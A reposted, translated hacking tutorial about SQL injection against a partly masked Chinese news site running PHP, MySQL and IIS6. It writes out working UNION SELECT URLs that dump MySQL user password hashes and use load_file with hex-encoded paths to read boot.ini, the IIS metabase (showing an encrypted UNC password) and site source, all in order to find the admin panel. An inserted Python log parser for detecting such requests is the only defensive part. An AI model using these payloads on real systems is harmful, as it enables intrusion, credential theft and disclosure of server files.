1. I could not find the back-office (admin) address, so I simply dumped the MySQL administrator's password:
http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(User,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
The data returned: root*cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd
2. Requesting a random path returned the IIS6 default 404 page, which indicates the web server environment is Windows + IIS6 + PHP + MySQL.
First, hex-encode the path string C:\\boot.ini, which gives 0x633a5c5c626f6f742e696e69.
Then request:
http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
The echoed content:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\windows="WINDOWS Server 2003, Enterprise" /fastdetect /noexecute=optout
Although load_file can read files, that alone seems of little use. But not so fast: since this is IIS6, loading the path C:\\windows\\system32\\inetsrv\\metabase.xml gets you the site configuration.
*Note: for file operations on Windows the path must use double backslashes; with a single backslash load_file will probably fail. Exploring the cause: presumably because the Windows slash leans this way (\, top left to bottom right) while the Linux slash is the other way (/, top right to bottom left). If a backslash in a Windows path is followed by a t, that gives \t, and what does \t mean in programming? The same goes for \n, or \'. Right: the backslash in the path is gone, consumed as an escape. A double backslash \\ is the real single backslash, and if you need to output a double backslash you have to write four: \\\\. Frustrating, isn't it?
The final statement to inject is:
http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
The main configuration entries to look at:
<IIsWebServer Location="/LM/W3SVC/2125961364"
AuthFlags="0"
LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
LogFileDirectory="E:\flylog"
LogFileLocaltimeRollover="FALSE"
LogFilePeriod="1"
LogFileTruncateSize="20971520"
LogPluginClsid="{ff160663-de82-11cf-bc0a-00aa006111e0}"
ServerAutoStart="TRUE"
ServerBindings=":80:***.com.cn
:80:www.***.com.cn"
ServerComment="***.com.cn"
>
</IIsWebServer>
And also:
<IIsWebVirtualDir Location="/LM/W3SVC/2125961364/ROOT"
AccessFlags="AccessRead | AccessWrite | AccessScript"
AppFriendlyName="Default Application"
AppIsolated="2"
AppRoot="/LM/W3SVC/2125961364/ROOT"
AuthFlags="AuthAnonymous | AuthNTLM"
DefaultDoc="Yindao.html,index.html,index.php,default.htm,default.asp,index.htm"
DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
Path="F:\web\2010716\new_flyer"
UNCPassword="49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a43833 66f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
>
</IIsWebVirtualDir>
From the Path value we construct:
http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
Right-click and view the page source.
*Note: when using load_file it is best to wrap it in hex(), i.e. hex(load_file(xxxxxxx)).
The reason: I once ran into a site whose home page had some problematic code somewhere, with the injection point on the home page itself. I used load_file on the home page file without wrapping it in hex(), and the home page went into a loop, something like this: index contains an iframe, the iframe loads index, which contains the iframe, which loads index again, and so on until the machine's resources are exhausted. I don't know whether that site actually used an iframe, but this kind of nesting does produce an endless loop, so I recommend wrapping load_file in hex().
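Every request on this page passes through the query string, and the metabase above has LogExtFileUriStem and LogExtFileUriQuery enabled, so the IIS logs record it. The following Python is an added example (not from the original post) that parses a constructed W3C log excerpt, flags UNION-based injection in cs-uri-query, and decodes any 0x... literal inside load_file(), wrapped in hex() or not, so the analyst can see which file was read.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample IIS W3C log excerpt (not real traffic), using the fields the
# metabase above enables: date, time, uri-stem, uri-query, client IP, status.
SAMPLE_LOG = """\
#Fields: date time cs-uri-stem cs-uri-query c-ip sc-status
2010-07-16 10:01:02 /news_detail.php newsid=17 192.0.2.10 200
2010-07-16 10:01:09 /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,concat(User,password),8+from+mysql.user 192.0.2.77 200
2010-07-16 10:02:30 /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8 192.0.2.77 200
2010-07-16 10:03:00 /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,hex(load_file(0x463a5c5c7765625c5c696e6465782e706870)),8 192.0.2.77 200
"""

UNION_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)
LOAD_FILE_RE = re.compile(r"load_file\s*\(\s*0x([0-9a-f]+)\s*\)", re.I)


def decode_hex_literal(hexdigits):
    """Decode a MySQL 0x... literal so the analyst sees which file path was requested."""
    try:
        return bytes.fromhex(hexdigits).decode("latin-1")
    except ValueError:  # odd length or non-hex characters
        return None


def parse_w3c(text):
    """Yield one dict per W3C log record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_injection_attempts(text):
    """Flag UNION-based injection in the query string and decode any load_file() targets."""
    hits = []
    for rec in parse_w3c(text):
        query = unquote_plus(rec.get("cs-uri-query", ""))  # '+' and %xx back to text
        if not UNION_RE.search(query):
            continue
        paths = [decode_hex_literal(h) for h in LOAD_FILE_RE.findall(query)]
        hits.append({
            "time": rec["time"], "client": rec["c-ip"], "uri": rec["cs-uri-stem"],
            "files_read": [p for p in paths if p is not None],
        })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit)
```

Decoded paths keep the doubled backslashes exactly as the attacker sent them, which is itself a useful fingerprint of the technique described above.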
What interests me more is this part of the index code:
require('admin_flier/common/function.php');
require('admin_flier/lib/class/form.class.php');
require('admin_flier/lib/class/db.class.php');
require('admin_flier/lib/class/page.class.php');
include('inc/head.php');
Oh, isn't that the back-office address?
[Repost] PHP + MySQL injection: using load_file on the IIS config file to get the back-office address